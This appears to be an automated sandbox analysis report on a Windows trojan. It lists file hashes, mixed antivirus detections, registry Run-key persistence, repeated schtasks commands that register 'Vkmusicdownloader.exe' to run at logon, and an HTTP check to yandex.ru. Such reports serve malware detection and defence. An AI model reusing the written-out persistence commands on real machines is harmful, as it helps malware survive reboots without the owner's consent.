Analysis Date: 2015-02-01 05:54:23
MD5: a1bfa2c1eb2aaab89dfd5284fafa6d20
SHA1: d7d40b952fe1dc80b49fc82cb4b3bb2ade1172a2

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 02b954386befcbd704b0b7372db31cf5 sha1: c35bac9d449d008b35f940808ed9eab3b761bbe7 size: 181760
Section: .rdata md5: 3e6dfbc881b625879e5f73d365554155 sha1: 3b20993407a7ff3afb12b2472813981876aa7f95 size: 51200
Section: .data md5: 078440e14fce15cb69d6b052da4a28a4 sha1: 3820a61be23302ab3fe1c6f870f41307f56be11d size: 8192
Section: .rsrc md5: 11fa5ba1e2fc7a4c8957bd01b7426c3d sha1: e3e56297a9dbcb8868e04029b2be61c26e8df5eb size: 16384
Section: .reloc md5: 129ac826c7439767197455afb4397931 sha1: f17aeed9b669446ca57f2082adcb2262241afcb8 size: 10752
Timestamp: 2015-01-22 11:19:01
Packer: Microsoft Visual C++ 8
PEhash: f4dda603c674292171e7f67cfcb94671b4003159
IMPhash: 0da04b85b7d70a3b23e8decf270c6978
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Variant.Graftor.166220
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): Gen:Variant.Graftor.166220
AV Authentium: W32/Trojan.BBWR-1475
AV Avira (antivir): TR/Agent.269312.59
AV BullGuard: Gen:Variant.Graftor.166220
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Gen:Variant.Graftor.166220
AV Eset (nod32): Win32/Agent.WPP
AV Fortinet: W32/Agent.WPP!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Gen:Variant.Graftor.166220
AV Grisoft (avg): Win32/DH{gRJ8gQ4PICUT}
AV Ikarus: Trojan.Win32.Agent
AV K7: Trojan ( 0048a4bc1 )
AV Kaspersky: Trojan.Win32.Agentb.bmpi
AV MalwareBytes: no_virus
AV Mcafee: RDN/Generic.dx!d2p
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): Gen:Variant.Graftor.166220
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: Trojan.Gen.2
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vkmusicdownloader ➝
"C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe"
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vkmusicdownloader ➝
"C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe"
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Vkmusicdownloader\DisplayName ➝
Vkmusicdownloader
Creates File: C:\malware.exe.cmd
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe
Creates File: PIPE\lsarpc
Creates Process: C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f
Creates Process: C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f
Creates Process: C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f
Creates Process: C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f
Winsock URL: http://yandex.ru

Process
↳ C:\WINDOWS\system32\cmd.exe

Process
↳ C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f

Creates File: PIPE\lsarpc

Process
↳ C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f

Creates Process: C:\WINDOWS\system32\drwtsn32 -p 268 -e 144 -g

Process
↳ C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f

Creates File: PIPE\lsarpc

Process
↳ C:\WINDOWS\system32\schtasks.exe /create /tn Vkmusicdownloader /tr C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\Vkmusicdownloader.exe /sc ONLOGON /f

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 268 -e 144 -g

Network Details:

DNS: yandex.ru
Type: A
213.180.193.11
DNS: yandex.ru
Type: A
213.180.204.11
DNS: yandex.ru
Type: A
93.158.134.11
HTTP GET: http://yandex.ru/
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 213.180.193.11:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   486f7374 3a207961 6e646578 2e72750d   Host: yandex.ru.
0x00000020 (00032)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000030 (00048)   6e6f2d63 61636865 0d0a0d0a            no-cache....


Strings